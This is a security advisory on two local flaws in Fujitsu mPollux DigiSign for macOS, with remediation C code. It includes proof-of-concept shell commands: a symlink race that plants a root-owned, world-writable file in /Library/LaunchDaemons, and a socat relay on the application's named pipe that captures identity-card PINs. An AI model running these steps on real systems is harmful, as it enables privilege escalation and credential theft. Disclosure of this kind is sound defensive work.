Fujitsu mPollux for macOS Multiple Vulnerabilities
Description
The Finnish Digital and Population Data Services Agency (DVV) provides card reader software that can be used for strong authentication and digital signing with DVV-issued identity cards. The Fujitsu mPollux DigiSign application communicates with the identity card and allows users to log in to official e-services and/or digitally sign documents. The Fujitsu mPollux DigiSign Client for macOS version 4.2.4c-8322 and earlier contains two security vulnerabilities that in the worst case can lead to full system compromise. The first vulnerability affects the mPollux software installation procedure, which handles files in an insecure manner and allows a local attacker to replace the files while they are being manipulated. Furthermore, insecure directory and file permissions for the named Unix pipe allow a local attacker to perform a Meddler in the Middle attack between the web browser plugin and the mPollux software, which can result in the exposure of PIN codes to unauthorized local users.
After WithSecure reported these vulnerabilities, Fujitsu released version 4.2.6-8401 of the mPollux DigiSign Client for macOS, which fixes them. It is highly recommended to update all installations to this version (or later if available).
Details
1 - CWE-61: UNIX Symbolic Link (Symlink) Following
mPollux creates a world-writable directory /Library/Preferences/mPolluxDigiSign. The software installation process creates a root-owned, world-writable (666) file in this directory using fopen() with a umask of 0. Because of this, fopen() follows symbolic links and allows creating any world-writable, root-owned file in the system. In addition, the installation process creates an SSLCA.cer file in this directory and then installs this certificate into the system certificate trust store. However, because the file resides in a world-writable directory, an attacker could trivially replace it with their own before it is installed into the root store, enabling a low-privileged local attacker to perform Meddler in the Middle attacks against any TLS connection.
Proof of Concept
- In a shell execute the following:
$ rm -f /Library/Preferences/mPolluxDigiSign/SSLCA.cer
$ while true; do ln -s /Library/LaunchDaemons/poc.plist \
    /Library/Preferences/mPolluxDigiSign/SSLCA.cer; done
- Install mPollux DigiSign (as the victim), then execute:
$ rm /Library/Preferences/mPolluxDigiSign/SSLCA.cer
$ echo "whatevercontent" > /Library/LaunchDaemons/poc.plist
This results in the application writing the file contents to the symlink destination. Since the file is created with umask 0 (mode 666), the attacker as a low-privileged user can now overwrite the newly created file contents as they see fit.
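The two defects described above (fopen() with a permissive umask, and a create call that follows a pre-planted symlink) are avoided by creating the file with O_CREAT|O_EXCL|O_NOFOLLOW, an explicit mode, and a post-creation fstat() check. The following is an added example written for this advisory, not Fujitsu's code; the function names, the scratch directory under /tmp and the file names are illustrative assumptions, and the demonstration only runs inside a directory it creates itself.

```c
/* Added example (not Fujitsu/WithSecure code): creating a configuration
 * file without the defects described in the advisory.
 * - O_CREAT|O_EXCL refuses any pre-existing path, a symlink included;
 * - O_NOFOLLOW refuses a symlink at the final path component;
 * - an explicit 0644 mode plus a sane umask keeps the file non-writable
 *   by other users even when the caller's umask is 0;
 * - fstat() on the open descriptor confirms what was actually created.
 */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 0 on success, -1 (errno set) if the path already exists, is a
 * symlink, or the created node is not a plain, non-world-writable file. */
int create_config_file(const char *path, const char *content)
{
    mode_t old = umask(022);            /* never inherit a permissive umask */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    umask(old);
    if (fd < 0)
        return -1;

    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || (st.st_mode & 0022)) {
        close(fd);
        unlink(path);
        errno = EPERM;
        return -1;
    }
    size_t len = strlen(content);
    if (write(fd, content, len) != (ssize_t)len) { close(fd); return -1; }
    return close(fd);
}

/* Mode bits of a path without following symlinks, or -1 if it is absent. */
int path_mode(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0) return -1;
    return (int)(st.st_mode & 07777);
}

/* Demonstration in a scratch directory (hypothetical names): a pre-planted
 * symlink named like the certificate file is rejected and nothing is written
 * to its target, while a fresh path is created 0644 even under umask 0.
 * Returns 0 when both behaviours hold. */
int demo(void)
{
    char dir[] = "/tmp/mpollux-demo.XXXXXX";
    if (mkdtemp(dir) == NULL) return -1;
    char target[256], link[256], fresh[256];
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(link, sizeof link, "%s/SSLCA.cer", dir);
    snprintf(fresh, sizeof fresh, "%s/fresh.cer", dir);

    if (symlink(target, link) != 0) return -1;   /* the planted symlink */
    umask(0);                                    /* the installer's umask */

    int r = 0;
    if (create_config_file(link, "cert") == 0) r = -1;   /* must refuse */
    if (path_mode(target) != -1) r = -1;                 /* nothing written */
    if (create_config_file(fresh, "cert") != 0) r = -1;  /* must succeed */
    if (path_mode(fresh) != 0644) r = -1;                /* not 0666 */

    unlink(link); unlink(fresh); rmdir(dir);
    return r;
}

int main(void)
{
    puts(demo() == 0 ? "hardened create behaves as expected" : "FAILED");
    return 0;
}
```

The decisive part is that the decision is made on the open file descriptor, not on a path that another user can change between a check and the write; the directory the file lives in should of course also not be world-writable in the first place.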
2 - CWE-732: Incorrect Permission Assignment for Critical Resource
The application's web browser plugin (libcryptoki.dylib) uses a named UNIX pipe to communicate with the main mPollux application. Since this file is created in the world-writable /Library/Preferences/mPolluxDigiSign directory, any other local unprivileged user can rename it. Since the file is created with default 666 permissions, any user can also read from and write to the original pipe file.
Proof of Concept
The attack can be implemented with, for example, socat:
$ s=/Library/Preferences/mPolluxDigiSign/DigiSignGUIServer_503
$ mv $s $s.real
$ socat -x -v -d -d UNIX-LISTEN:$s,reuseaddr,fork \
    UNIX-CONNECT:$s.real
When using the browser to authenticate the identity card, the PIN code will be visible in clear text in socat output:
> 2023/04/12 15:50:30.000396022  length=68 from=0 to=67
 0f 00 00 00 00 00 00 00 38 00 00 00 01 04 00 00  ........8.......
 00 01 00 00 00 02 1e 00 00 00 53 43 4d 20 4d 69  ..........SCM Mi
 63 72 6f 73 79 73 74 65 6d 73 20 49 6e 63 2e 20  crosystems Inc. 
 53 43 52 20 33 33 31 00 02 07 00 00 00 XX XX XX  SCR 331......XXX
 XX XX XX 00                                      XXX.
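The rename and the read/write access both follow from where and how the IPC endpoint is created. An endpoint that other local users can neither rename nor connect to needs a parent directory that is not writable by others (or at least sticky) and a socket node created with a restrictive mode. The following is an added example written for this advisory, not Fujitsu's code; it uses an AF_UNIX socket rather than a FIFO, the function names and the scratch directories under /tmp are assumptions, and the endpoint name merely echoes the one in the advisory.

```c
/* Added example (not Fujitsu/WithSecure code): creating a local IPC
 * endpoint so that other local users cannot rename it or talk to it.
 * The parent directory must belong to the service user and must not be
 * writable by others (the sticky bit alone also stops renames by others),
 * and the socket node is created under umask 077 so it ends up 0600. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <unistd.h>

/* Returns 1 if dir is owned by the caller and other users cannot add,
 * remove or rename entries in it; 0 otherwise. */
int dir_is_private(const char *dir)
{
    struct stat st;
    if (lstat(dir, &st) != 0 || !S_ISDIR(st.st_mode)) return 0;
    if (st.st_uid != geteuid()) return 0;
    if ((st.st_mode & S_IWOTH) && !(st.st_mode & S_ISVTX)) return 0;
    return 1;
}

/* Creates a listening AF_UNIX socket at path with mode 0600.
 * Returns the listening descriptor, or -1 (errno set) on failure. */
int bind_private_socket(const char *path)
{
    struct sockaddr_un addr;
    if (strlen(path) >= sizeof addr.sun_path) { errno = ENAMETOOLONG; return -1; }
    int fd = socket(AF_UNIX, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    memset(&addr, 0, sizeof addr);
    addr.sun_family = AF_UNIX;
    strcpy(addr.sun_path, path);
    mode_t old = umask(077);                 /* socket node is created 0600 */
    int rc = bind(fd, (struct sockaddr *)&addr, sizeof addr);
    umask(old);
    if (rc != 0 || listen(fd, 8) != 0) { close(fd); return -1; }
    /* explicit chmod for platforms that do not apply umask to sockets */
    if (chmod(path, 0600) != 0) { close(fd); unlink(path); return -1; }
    return fd;
}

/* Mode bits of a socket node (no symlink following), -1 if absent or not
 * a socket. */
int socket_mode(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0 || !S_ISSOCK(st.st_mode)) return -1;
    return (int)(st.st_mode & 07777);
}

/* Demonstration with two scratch directories (hypothetical names): a
 * world-writable one, as in the advisory, is rejected; a 0700 one is
 * accepted and yields a 0600 socket even when the caller's umask is 0.
 * Returns 0 when all of that holds. */
int demo_socket(void)
{
    char bad[] = "/tmp/mpollux-ipc-bad.XXXXXX";
    char good[] = "/tmp/mpollux-ipc-good.XXXXXX";
    if (!mkdtemp(bad) || !mkdtemp(good)) return -1;
    chmod(bad, 0777);                        /* world-writable, no sticky bit */
    chmod(good, 0700);
    int r = 0;
    if (dir_is_private(bad)) r = -1;
    if (!dir_is_private(good)) r = -1;

    char path[256];
    snprintf(path, sizeof path, "%s/DigiSignGUIServer", good);
    umask(0);                                /* must not weaken the result */
    int fd = bind_private_socket(path);
    if (fd < 0 || socket_mode(path) != 0600) r = -1;
    if (fd >= 0) close(fd);
    unlink(path); rmdir(good); rmdir(bad);
    return r;
}

int main(void)
{
    puts(demo_socket() == 0 ? "private IPC endpoint behaves as expected" : "FAILED");
    return 0;
}
```

Checking the parent directory is the part that matters most for the rename step of the attack: file permissions on the socket node itself do not prevent another user from moving it aside if the directory allows it.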
Recommendations
After WithSecure reported these vulnerabilities, Fujitsu released mPollux DigiSign Client for macOS version 4.2.6-8401 to address these issues. It is highly recommended to update all installations to this version (or later if available).